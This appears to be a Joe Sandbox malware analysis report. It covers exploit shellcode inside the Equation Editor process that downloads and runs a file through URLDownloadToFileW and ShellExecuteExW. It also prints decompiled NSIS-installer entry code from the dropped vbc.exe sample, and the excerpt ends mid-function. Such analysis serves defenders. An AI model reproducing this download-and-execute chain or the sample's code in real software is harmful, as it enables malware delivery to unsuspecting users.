Function 0357044F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<, xrefs: 035704D0

Memory Dump Source

Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID: <
API String ID: 3584569557-4251816714
Opcode ID: d063475578b2e5cb5f42e1ce578550a3b89ec736e0c9c7a6e5d45bb2f6deec2c
Instruction ID: c7d4d88df139a83ea3ce2c29563ffab5a565517600e8f6157bfde55a6c441c19
Opcode Fuzzy Hash: d063475578b2e5cb5f42e1ce578550a3b89ec736e0c9c7a6e5d45bb2f6deec2c
Instruction Fuzzy Hash: F4314BE680C3C16FDB239B30AC69666BFE16F57214F5989CED4C64B4F3E6688401C712

Uniqueness

Uniqueness Score: -1.00%

Function 035704BA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03570460,?,00000000,00000000), ref: 035704BC

Part of subcall function 03570504: ShellExecuteExW.SHELL32(0000003C), ref: 03570526
Part of subcall function 03570504: ExitProcess.KERNEL32(00000000), ref: 0357053E

Strings

<, xrefs: 035704D0

Memory Dump Source

Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID: <
API String ID: 3584569557-4251816714
Opcode ID: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
Instruction ID: 6b414c82decac0ea31f50790ad1efbdeafb70bfc77d262678a9fb39662d02cbc
Opcode Fuzzy Hash: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
Instruction Fuzzy Hash: 4F0126E980C3806EE761EB34F88876ABAE4BFC4280F040859A446871F2EE74C904D605

Uniqueness

Uniqueness Score: -1.00%

Function 03570504 Relevance: 3.0, APIs: 2, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
Instruction ID: 677e21c3d0826206622b880754c5480c4e744c87a89895fbcccc53fe8123b03e
Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
Instruction Fuzzy Hash: 9E01A2D880834668DF71F728F4882B9EED0FF822C4B9C8856A8D2470F5D9149583861D

Uniqueness

Uniqueness Score: -1.00%

Function 0357051B Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 03570526

Part of subcall function 03570539: ExitProcess.KERNEL32(00000000), ref: 0357053E

Memory Dump Source

Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
Instruction ID: e47724598d3a48aaf9a4f9ddead151772435365a08fd565c062311a709ae5ff2
Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
Instruction Fuzzy Hash: E2F0FFC980426211DF30F668F8583BAAFD4FF922D0F8C8843A8C2070F5D96892C38A19

Uniqueness

Uniqueness Score: -1.00%

Function 03570539 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 0357053E

Memory Dump Source

Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03570540 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 4634eb66db5eaf4010e2bb0e8e77a610ef1ff3a33ef1398718d04785778674ef
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: 95D052B1202502CFC344DF04E980E62F3BAFFC8661B28C268E0044B669C330E892CA90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03570390 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(0357037E), ref: 03570390

Memory Dump Source

Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 92e99969890bcb78d68b0f15f2aeb8007205d658bbf80d9a294b31fbf41807e7
Instruction ID: df57c4bd598dbcc13cb50121db5ab24ad8be2d97a7f1b6fd62e4d147a772025a
Opcode Fuzzy Hash: 92e99969890bcb78d68b0f15f2aeb8007205d658bbf80d9a294b31fbf41807e7
Instruction Fuzzy Hash: A711BB5580E7C15FC712EB707E6A059FFB2B913100B5C86CB80C58B1F3E218964AD392

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 2156, Parent PID: 2644COMMON

Execution Graph

Execution Coverage:	17.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16%
Total number of Nodes:	1586
Total number of Limit Nodes:	31

Executed Functions

Function 0040350A Relevance: 79.2, APIs: 33, Strings: 12, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				signed int _t234;
				WCHAR* _t235;

				0x7b3000 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x7a8b18 = _v324.dwBuildNumber;
				 *0x7a8b1c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x7a8b1e != 0x600) {
					_t180 = E004068E7(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E00406877(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E004068E7(0xb);
				 *0x7a8a64 = E004068E7(9);
				_t88 = E004068E7(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x7a8b1c =  *0x7a8b1c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x7a8b20 = _t88;
				SHGetFileInfoW(0x79ff08, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040651A(0x7a7a60, L"NSIS Error");
				E0040651A(0x7b3000, GetCommandLineW());
				_t94 = 0x7b3000;
				_t234 = 0x22;
				 *0x7a8a60 = 0x400000;
				if( *0x7b3000 == _t234) {
					_t94 = 0x7b3002;
				}
				_t199 = CharNextW(E00405E16(_t94, 0x7b3000));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E16(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040651A(0x7b3800, _t199);
										L37:
										_t235 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034D9(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403AEF();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x7a8af4 == _t189) {
														L77:
														_t120 =  *0x7a8b0c;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E004068E7(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B7A(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x7a8a7c == _t189) {
												L51:
												 *0x7a8b0c =  *0x7a8b0c | 0xffffffff;
												_v24 = E00403BC9(_t265);
												goto L68;
											}
											_t219 = E00405E16(0x7b3000, _t189);
											if(_t219 < 0x7b3000) {
												L48:
												_t264 = _t219 - 0x7b3000;
												_v8 = L"Error launching installer";
												if(_t219 < 0x7b3000) {
													_t190 = E00405AE5(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x7b4800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AC8();
														} else {
															E00405A4B();
														}
														SetCurrentDirectoryW(_t235);
														__eflags =  *0x7b3800;
														if( *0x7b3800 == 0) {
															E0040651A(0x7b3800, 0x7b4800);
														}
														E0040651A(0x7a9000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x7a9800 = _t144;
														do {
															E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x120)));
															DeleteFileW(0x79f708);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(0x7b6800, 0x79f708, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062DA(_t202, 0x79f708, 0);
																	E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x124)));
																	_t153 = E00405AFD(0x79f708);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x7a9800 =  *0x7a9800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062DA(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405EF1(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040651A(0x7b3800, _t222);
												E0040651A(0x7b4000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= 0x7b3000) {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034D9(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034D9(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x7a8b00 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x00403518
0x00403519
0x00403520
0x00403523
0x0040352a
0x0040352d
0x00403540
0x00403546
0x00403549
0x0040354c
0x0040355a
0x00403562
0x0040356d
0x00403586
0x00403588
0x00403590
0x00403590
0x0040359b
0x0040359d
0x0040359d
0x004035b2
0x004035d7
0x004035e5
0x004035e8
0x004035ef
0x004035f6
0x004035f6
0x004035ef
0x004035f8
0x004035fd
0x004035fe
0x0040360a
0x0040360e
0x00403615
0x00403623
0x00403628
0x0040362f
0x00403633
0x00403637
0x00403639
0x00403639
0x00403637
0x00403640
0x00403647
0x0040364d
0x00403665
0x00403675
0x00403687
0x0040368e
0x00403690
0x00403691
0x004036a2
0x004036a6
0x004036a6
0x004036b9
0x004036bb
0x004037b5
0x004037b5
0x004037b8
0x004037bb
0x00000000
0x00000000
0x004036c5
0x004036c6
0x004036c9
0x004036d2
0x004036d2
0x004036d5
0x004036d8
0x004036db
0x004036de
0x004036de
0x004036de
0x004036df
0x004036e3
0x004037a3
0x004037ac
0x004037ae
0x004037b1
0x004037b4
0x004037b4
0x004037b4
0x00000000
0x004036e9
0x004036ea
0x004036eb
0x004036ef
0x00403709
0x00403710
0x00403723
0x00403724
0x00403739
0x0040373e
0x00403740
0x00403742
0x0040375e
0x00403765
0x00403778
0x00403779
0x0040378e
0x00403794
0x00403796
0x00403798
0x004037a0
0x004037a2
0x00000000
0x004037a2
0x0040379c
0x0040379e
0x004037c3
0x004037c7
0x004037d0
0x004037d5
0x004037db
0x004037e6
0x004037e8
0x004037ed
0x004037ef
0x00403847
0x0040384c
0x00403855
0x0040385c
0x0040385f
0x00403a36
0x00403a36
0x00403a3b
0x00403a44
0x00403a61
0x00403ad9
0x00403ad9
0x00403ae1
0x00403ae3
0x00403ae3
0x00403ae9
0x00403ae9
0x00403a78
0x00403a84
0x00403a95
0x00403a9c
0x00403aa3
0x00403aa3
0x00403aab
0x00403ab7
0x00403ac5
0x00403ad0
0x00000000
0x00000000
0x00000000
0x00403ab9
0x00403ab9
0x00403aba
0x00403abc
0x00403abd
0x00403abe
0x00403ac3
0x00403ad2
0x00403ad4
0x00000000
0x00403ad4
0x00000000
0x00403ac3
0x00403ab7
0x00403a4e
0x00403a55
0x00403a55
0x0040386b
0x00403912
0x00403912
0x0040391e
0x00000000
0x0040391e
0x0040387c
0x00403884
0x004038d6
0x004038d6
0x004038dc
0x004038e3
0x00403931
0x00403933
0x00403938
0x0040393a
0x00403942
0x00403942
0x0040394d
0x00403959
0x0040395f
0x00403961
0x00403a34
0x00403a34
0x00403a34
0x00000000
0x00403967
0x00403967
0x00403969
0x0040396a
0x00403973
0x0040396c
0x0040396c
0x0040396c
0x00403979
0x00403981
0x00403988
0x00403990
0x00403990
0x0040399d
0x004039a9
0x004039b3
0x004039b3
0x004039b5
0x004039bc
0x004039c6
0x004039d2
0x004039d8
0x004039de
0x004039e1
0x004039eb
0x004039f1
0x004039f3
0x004039f7
0x00403a08
0x00403a0e
0x00403a13
0x00403a15
0x00403a18
0x00403a1e
0x00403a1e
0x00403a15
0x004039f3
0x00403a21
0x00403a28
0x00403a28
0x00403a28
0x00403a28
0x00403a2f
0x00000000
0x00403a2f
0x00403961
0x004038e5
0x004038e8
0x004038ec
0x004038f1
0x004038f3
0x00000000
0x00000000
0x004038ff
0x0040390a
0x0040390f
0x00000000
0x0040390f
0x0040388d
0x004038a5
0x004038b6
0x004038b7
0x004038bb
0x004038bd
0x004038cb
0x004038d2
0x00000000
0x00000000
0x00000000
0x004038d2
0x004038d4
0x00000000
0x004038d4
0x004037f7
0x00403803
0x00403808
0x0040380d
0x0040380f
0x00000000
0x00000000
0x00403817
0x0040381f
0x00403830
0x00403838
0x0040383a
0x0040383f
0x00403841
0x00000000
0x00000000
0x00000000
0x00403841
0x00000000
0x0040379e
0x00403747
0x00403749
0x00000000
0x00000000
0x0040374b
0x0040374f
0x00403753
0x0040375a
0x0040375a
0x0040375a
0x0040375a
0x00000000
0x0040375a
0x00403755
0x00403758
0x00000000
0x00000000
0x00000000
0x00403758
0x004036f1
0x004036f5
0x004036f8
0x004036ff
0x004036ff
0x00000000
0x004036ff
0x004036fa
0x004036fd
0x00000000
0x00000000
0x00000000
0x004036fd
0x00000000
0x00000000
0x00000000
0x004036cb
0x004036cb
0x004036cc
0x004036cd
0x004036cd
0x00000000
0x004036cb
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 0040352D
GetVersionExW.KERNEL32(?), ref: 00403556
GetVersionExW.KERNEL32(0000011C), ref: 0040356D
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403604
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403640
OleInitialize.OLE32(00000000), ref: 00403647
SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 00403665
GetCommandLineW.KERNEL32(007A7A60,NSIS Error), ref: 0040367A
CharNextW.USER32(00000000), ref: 004036B3
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004037E6
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037F7
lstrcatW.KERNEL32 ref: 00403803
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403817
lstrcatW.KERNEL32 ref: 0040381F
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403830
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403838
DeleteFileW.KERNELBASE(1033), ref: 0040384C
lstrcatW.KERNEL32 ref: 00403933
lstrcatW.KERNEL32 ref: 00403942

Part of subcall function 00405AC8: CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE

lstrcatW.KERNEL32 ref: 0040394D
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,?), ref: 00403959
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403979
DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?), ref: 004039D8
CopyFileW.KERNEL32 ref: 004039EB
CloseHandle.KERNEL32(00000000), ref: 00403A18
OleUninitialize.OLE32 ref: 00403A3B
ExitProcess.KERNEL32 ref: 00403A55
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A69
OpenProcessToken.ADVAPI32(00000000), ref: 00403A70
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A84
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AA3
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AC8
ExitProcess.KERNEL32 ref: 00403AE9

Strings

~nsu, xrefs: 0040392B
UXTHEME, xrefs: 004035F8, 004035FD, 00403603
C:\Users\user\AppData\Local\Temp\, xrefs: 004037DB, 004037E0, 004037F6, 00403802, 00403811, 0040381E, 0040382A, 00403832, 00403930, 00403941, 0040394C, 00403958, 00403969, 00403978, 00403A2E
TEMP, xrefs: 0040382B
SeShutdownPrivilege, xrefs: 00403A7E
.tmp, xrefs: 00403947
\Temp, xrefs: 004037FD
Error launching installer, xrefs: 004038DC
Low, xrefs: 00403819
1033, xrefs: 00403847
TMP, xrefs: 00403833
NSIS Error, xrefs: 0040366B

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-2607992671
Opcode ID: 4f4eec0de79c21e215e23cc6c73292148191a8a8d39fbf5898b354216cb2abd3
Instruction ID: 53a60b58fdbd25313d51bce5ca3a2b86b24fade18f433b590921527e5da6acff
Opcode Fuzzy Hash: 4f4eec0de79c21e215e23cc6c73292148191a8a8d39fbf5898b354216cb2abd3
Instruction Fuzzy Hash: B2E1F8B0A00214ABD720AFB59D45ABF3AB8EB45705F10807EF581B62D1DB7C8B41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056BB Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004056BB(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a44;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040564F, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406557(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
